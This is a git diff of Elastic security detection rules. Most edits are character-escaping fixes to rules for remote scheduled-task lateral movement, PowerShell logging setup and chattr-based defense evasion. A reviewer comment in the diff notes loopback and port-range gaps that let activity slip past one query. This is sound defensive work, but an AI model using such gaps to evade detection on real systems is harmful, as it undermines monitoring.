host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. 
Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", - "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port \u003e= 49152 and destination.port \u003e= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -85,7 +85,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_105.json b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_105.json
index 56be0a50232..9ef3d9f23da 100644
--- a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_105.json
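Review bot: The loopback exclusion in the network step of the query, `source.ip != "127.0.0.1" and source.ip != "::1"`, excludes only two exact addresses; if its purpose is to drop local RPC connections to the Task Scheduler service, any other 127.0.0.0/8 address (or an IPv4-mapped form, depending on how the sensor reports the address) still passes and then pairs with the TaskCache write as a "remote" creation. A CIDR test states the intent and covers the whole range: `not cidrMatch(source.ip, "127.0.0.0/8", "::1/128")`. The `>= 49152` bounds on both ports assume the default Windows dynamic RPC port range, so hosts with a customised range would be missed, which deserves a sentence in the note's false-negative discussion. Since this file is an exported copy of the rule, the change should be made in the upstream rule source so every version picks it up.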
@@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_106.json b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_106.json index 3336af9fa79..94371c83138 100644 --- a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_106.json +++ b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_106.json 
@@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_107.json b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_107.json index b61afa0a4fa..10f8fe5ab8b 100644 --- a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_107.json +++ b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_107.json 
@@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_1.json b/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_1.json index 22f5933dd37..1d058316d8b 100644 --- a/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_1.json +++ b/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_1.json 
@@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_2.json b/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_2.json index 92a5cc48d3f..f635eac774e 100644 --- a/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_2.json +++ b/packages/security_detection_engine/kibana/security_rule/9661ed8b-001c-40dc-a777-0983b7b0c91a_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_103.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_103.json index c06521ca55e..51864c889cc 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_103.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_103.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_104.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_104.json index a36bbc8d385..ea508e50fcc 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_104.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_104.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_105.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_105.json index e7223af21ed..4c2c2278686 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_105.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_105.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_106.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_106.json index b283cc15d9e..71ff37e3bac 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_106.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_106.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_107.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_107.json index 5248ad78939..308ca7cbbf9 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_107.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_107.json 
@@ -14,7 +14,7 @@ "license": "Elastic License v2", "max_signals": 33, "name": "File made Immutable by Chattr", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and user.name == \"root\" and\n process.executable : \"/usr/bin/chattr\" and process.args : (\"-*i*\", \"+*i*\") and\n not process.parent.executable: (\"/lib/systemd/systemd\", \"/usr/local/uems_agent/bin/*\", \"/usr/lib/systemd/systemd\")\n", "related_integrations": [ { @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_108.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_108.json index bcbe6f57055..ed2f012c3f3 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_108.json 
+++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_108.json 
@@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_109.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_109.json index 2b3d9f77e8d..7294a4579fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_109.json +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_109.json 
@@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
